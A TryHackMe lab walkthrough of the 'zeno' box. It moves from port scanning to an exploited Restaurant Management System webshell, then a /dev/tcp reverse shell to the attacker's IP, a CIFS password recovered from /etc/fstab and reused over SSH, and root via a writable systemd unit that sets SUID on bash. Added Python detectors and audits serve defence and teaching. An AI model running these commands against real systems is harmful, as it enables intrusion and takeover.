#tryhackme #linux #medium
![[Pasted image 20250704152555.png]]
---
# Information Gathering - Nmap
A TCP SYN scan against all ports revealed only two open ports: 22 and 12340.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:29 CDT
Nmap scan report for 10.10.19.28
Host is up (0.13s latency).
Not shown: 65482 filtered tcp ports (no-response), 51 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
12340/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 43.97 seconds
```
I then ran a more detailed scan against those two ports with default scripts (`-sC`) and version detection (`-sV`).
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,12340
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:31 CDT
Nmap scan report for 10.10.19.28
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
12340/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: We've got some trouble | 404 - Resource not found
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods:
|_ Potentially risky methods: TRACE
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.97 seconds
```
Finally, I ran a UDP scan against the top 1,000 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 12:32 CDT
Nmap scan report for 10.10.19.28
Host is up (0.13s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
69/udp filtered tftp
24854/udp filtered unknown
49176/udp filtered unknown
49193/udp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
```
---
# Footprinting
We found two open ports: 22 and 12340. Port 22 (SSH) is usually not very useful in the enumeration phase, especially without any credentials, so let's look at port 12340, which hosts a web service (Apache httpd 2.4.6 with PHP/5.4.16 according to the version scan).
This is the landing page. It's trying to convince us that there's no juicy information here. Let's keep looking to see if that's really the case.
![[Pasted image 20250704123525.png]]
##### gobuster
I couldn't find anything useful on the landing page, so I ran `gobuster` to brute-force directories and found `/rms`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP:12340 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.19.28:12340
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/rms (Status: 301) [Size: 237] [--> http://10.10.19.28:12340/rms/]
```
This is the landing page of `/rms`. It says "WELCOME TO PATHFINDER HOTEL **RESTAURANT MANAGEMENT SYSTEM**", so `rms` most likely stands for Restaurant Management System, a web application in the same vein as a CMS.
![[Pasted image 20250704124615.png]]
# Exploit
I searched `searchsploit` for `restaurant management system`, somewhat sceptically, wondering whether anything would turn up, and exploits for it actually existed in the database!
![[Pasted image 20250704132108.png]]
I downloaded the RCE exploit and removed the `proxies` variable, since we don't need it.
![[Pasted image 20250704134108.png]]
I ran the exploit successfully; at the bottom of its output it reports that the shell was uploaded and that I should check the URL `/rms/images/reverse-shell.php`.
![[Pasted image 20250704134302.png]]
I confirmed that the uploaded payload executes commands, running as the `apache` user.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ curl $IP:12340/rms/images/reverse-shell.php?cmd=id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
```
To get a proper interactive reverse shell, I URL-encoded the following one-liner and passed it as the `cmd` parameter: `bash -c "bash -i >& /dev/tcp/10.23.133.183/1234 0>&1"`
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ curl $IP:12340/rms/images/reverse-shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.23.133.183%2F1234%200%3E%261%22
```
And it worked: my `nc` listener caught the connection as the `apache` user.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.19.28] 38074
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
bash-4.2$
```
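From the defender's side, the activity above leaves a clear trace in the Apache access log: a `.php` file executed from `/rms/images/`, a directory that should only serve static files, with a `cmd=` query parameter. The following is an added example (not from the writeup or the exploit script) that flags such requests over constructed log lines; the upload endpoint path is a placeholder, since the writeup does not show it.

```python
"""Detection for the webshell activity shown above: PHP executed from an
images/upload directory with a cmd= parameter. Added example, not part of the
original writeup. The access-log lines are constructed (Apache combined
format); the upload path is a placeholder, the cmd= URL mirrors the one above."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines; "UPLOAD_PATH" stands in for
# whatever endpoint the exploit used (the writeup does not show it).
SAMPLE_LOG = """\
10.23.133.183 - - [04/Jul/2025:13:43:01 -0500] "POST /rms/UPLOAD_PATH HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.23.133.183 - - [04/Jul/2025:13:43:02 -0500] "GET /rms/images/reverse-shell.php?cmd=id HTTP/1.1" 200 88 "-" "curl/8.5.0"
10.23.133.183 - - [04/Jul/2025:13:45:10 -0500] "GET /rms/images/reverse-shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.23.133.183%2F1234%200%3E%261%22 HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.23.133.183 - - [04/Jul/2025:13:45:11 -0500] "GET /rms/images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
STATIC_DIRS = ("/rms/images/",)  # directories that must never serve server-side code

def find_webshell_hits(log_text):
    """Return one finding per request that executes PHP under a static-only directory,
    with the decoded cmd= value so an analyst sees what was run."""
    findings = []
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue  # malformed line; a real pipeline would count these
        parts = urlsplit(m["target"])
        if not parts.path.endswith(".php") or not parts.path.startswith(STATIC_DIRS):
            continue
        cmd = parse_qs(parts.query).get("cmd", [None])[0]  # percent-decoded
        findings.append({"ts": m["ts"], "src": m["ip"], "path": parts.path,
                         "cmd": cmd, "status": int(m["status"])})
    return findings
```

The same rule, PHP requested under an upload or images path, is what a WAF or a `<FilesMatch "\.php$">` deny in the directory's Apache config would enforce before execution rather than after.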
# Lateral Movement
After enumerating the box for a while, I landed in `/etc/fstab`, where I found an interesting (commented-out) CIFS mount entry with a username and password embedded in its mount options.
![[Pasted image 20250704142748.png]]
```bash
#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=FrobjoodAdkoonceanJa,domain=localdomain,soft 0 0
```
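The lesson for defenders is that `/etc/fstab` is world-readable by design, so any `username=`/`password=` mount options, even on a commented-out line, are exposed to every local user. As an added example, not part of the writeup, this check parses fstab entries and reports the ones carrying an inline password; the sample entries are constructed and the password value is a placeholder.

```python
"""Audit fstab-style entries for credentials embedded in mount options.
Added example, not part of the original writeup: /etc/fstab is world-readable,
so username=/password= options (even on a commented-out line, as found above)
are exposed to every local user. Sample entries are constructed; the password
is a placeholder, not the one recovered from the box."""

# Constructed sample, modelled on the entry found above (password replaced).
SAMPLE_FSTAB = """\
UUID=1234-ABCD / xfs defaults 0 0
#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=PLACEHOLDER,domain=localdomain,soft 0 0
//fileserver/share /mnt/share cifs credentials=/etc/cifs-creds,vers=3.0 0 0
//fileserver/guest /mnt/guest cifs guest,ro 0 0
"""

CRED_OPTS = ("username", "user", "password", "pass")

def find_fstab_credentials(text):
    """Return one finding per entry whose options carry an inline password.
    Commented-out lines are reported too: the secret is just as readable."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        commented = line.startswith("#")
        fields = line.lstrip("#").split()
        if len(fields) < 4:
            continue  # not a complete fstab record
        source, mountpoint, fstype, options = fields[:4]
        exposed = {}
        for opt in options.split(","):
            key, sep, value = opt.partition("=")
            if sep and key in CRED_OPTS:
                exposed[key] = value
        if "password" in exposed or "pass" in exposed:
            findings.append({
                "line": lineno, "source": source, "mountpoint": mountpoint,
                "fstype": fstype, "commented": commented,
                "username": exposed.get("username") or exposed.get("user"),
                "fix": "move the secret to a root-only 0600 credentials= file",
            })
    return findings
```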
I re-used the password from `/etc/fstab` against the SSH server, this time for the user `edward`, and it let me in!
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ssh edward@$IP
The authenticity of host '10.10.153.102 (10.10.153.102)' can't be established.
ED25519 key fingerprint is SHA256:rRttffFIyZasFZ3kH1UCuXbqoQKD5nKQWgtEudn7nys.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.153.102' (ED25519) to the list of known hosts.
edward@10.10.153.102's password:
Last login: Tue Sep 21 22:37:30 2021
[edward@zeno ~]$ whoami
edward
```
I found `user.txt` in edward's home directory:
```bash
[edward@zeno ~]$ cd /home/edward
[edward@zeno ~]$ ls
user.txt
[edward@zeno ~]$ cat user.txt
THM{07...
```
# Privilege Escalation
`sudo -l` reveals that edward can run the `/usr/sbin/reboot` binary as root without a password. It turned out to be a symbolic link to `/bin/systemctl`.
Running `sudo /usr/sbin/reboot` therefore invokes `/bin/systemctl`, which, because it was called under the name `reboot`, simply reboots the system. On its own that is not enough for privilege escalation yet.
```bash
[edward@zeno ~]$ sudo -l
Matching Defaults entries for edward on zeno:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User edward may run the following commands on zeno:
(ALL) NOPASSWD: /usr/sbin/reboot
```
```bash
[edward@zeno ~]$ ls -l /usr/sbin/reboot
lrwxrwxrwx. 1 root root 16 Jul 26 2021 /usr/sbin/reboot -> ../bin/systemctl
```
Searching for writable files, I found `/etc/systemd/system/zeno-monitoring.service`. The file is owned by `root`, but it is world-readable and world-writable (`-rw-rw-rw-`). Its `ExecStart` directive holds the command that systemd runs as `User=root` when the unit starts, which, since the unit is `WantedBy=multi-user.target`, happens at boot.
```bash
[edward@zeno ~]$ find / -type f -writable 2>/dev/null
/etc/systemd/system/zeno-monitoring.service
/var/spool/mail/zeno
/var/spool/mail/edward
/home/edward/.ssh/authorized_keys
```
```bash
-rw-rw-rw-. 1 root root 144 Jul 4 22:14 /etc/systemd/system/zeno-monitoring.service
```
```bash
[edward@zeno ~]$ cat /etc/systemd/system/zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/root/zeno-monitoring.py
[Install]
WantedBy=multi-user.target
```
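The root cause here is a unit file that runs as `root` at boot but is writable by everyone. As an added example, not part of the writeup, this audit flags `.service` files that group or others can write (or that the expected owner does not own) and reports the `ExecStart` each would run; the two unit files are constructed in a temporary directory so it runs offline.

```python
"""Audit systemd unit files for the weakness abused above: a unit that runs as
root at boot but lives in a file a non-root user can modify. Added example, not
part of the original writeup; the units are constructed in a temp directory so
it runs offline (on a real host, call audit_unit_dir("/etc/systemd/system"))."""
import os
import stat
import tempfile

# Constructed sample: the first unit mirrors the one on the box (mode 0666,
# User=root, started at boot); the second has sane permissions.
WEAK_UNIT = ("[Unit]\nDescription=Zeno monitoring\n[Service]\nType=simple\n"
             "User=root\nExecStart=/root/zeno-monitoring.py\n"
             "[Install]\nWantedBy=multi-user.target\n")
SAFE_UNIT = WEAK_UNIT.replace("Zeno monitoring", "Safe unit")

def unit_exec_start(path):
    """Return the ExecStart command of a unit file, or None if it has none."""
    with open(path) as fh:
        for line in fh:
            key, sep, value = line.strip().partition("=")
            if sep and key == "ExecStart":
                return value
    return None

def audit_unit_dir(directory, expected_owner=0):
    """Flag .service files writable by group/others or not owned by expected_owner."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".service"):
            continue
        path = os.path.join(directory, name)
        st = os.stat(path)
        loose_mode = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
        if loose_mode or st.st_uid != expected_owner:
            findings.append({"unit": name, "mode": oct(stat.S_IMODE(st.st_mode)),
                             "exec_start": unit_exec_start(path),
                             "fix": "chown root:root; chmod 644; systemctl daemon-reload"})
    return findings

def audit_sample():
    """Write the two constructed units and audit them as the current user."""
    directory = tempfile.mkdtemp(prefix="unit-audit-")
    for name, body, mode in (("zeno-monitoring.service", WEAK_UNIT, 0o666),
                             ("safe.service", SAFE_UNIT, 0o644)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)  # set explicitly, so the umask does not interfere
    return audit_unit_dir(directory, expected_owner=os.geteuid())
```

Pairing this with a check of `sudo -l` entries that resolve to symlinks (here `reboot` to `systemctl`) covers both halves of the chain used above.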
I changed the `ExecStart` directive to the following:
```bash
[edward@zeno ~]$ cat /etc/systemd/system/zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/usr/bin/chmod +s /bin/bash
[Install]
WantedBy=multi-user.target
```
Then I rebooted the system by running `sudo /usr/sbin/reboot`:
```bash
[edward@zeno ~]$ sudo /usr/sbin/reboot
Connection to 10.10.153.102 closed by remote host.
Connection to 10.10.153.102 closed.
```
After a few moments, I logged back in over SSH as edward and ran `/bin/bash -p`, which gave me a shell as `root` (the `-p` flag keeps the effective UID granted by the SUID bit instead of dropping it).
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ssh edward@$IP
edward@10.10.153.102's password:
Last login: Fri Jul 4 21:53:29 2025 from ip-10-23-133-183.eu-west-1.compute.internal
-bash-4.2$ whoami
edward
-bash-4.2$ /bin/bash -p
bash-4.2# whoami
root
```
You can see that the SUID and SGID bits are now set on `/bin/bash` (`-rwsr-sr-x`).
```bash
bash-4.2# ls -l /bin/bash
-rwsr-sr-x. 1 root root 964536 Apr 1 2020 /bin/bash
```
Found `root.txt`!
```bash
bash-4.2# cat root.txt
THM{b1...
```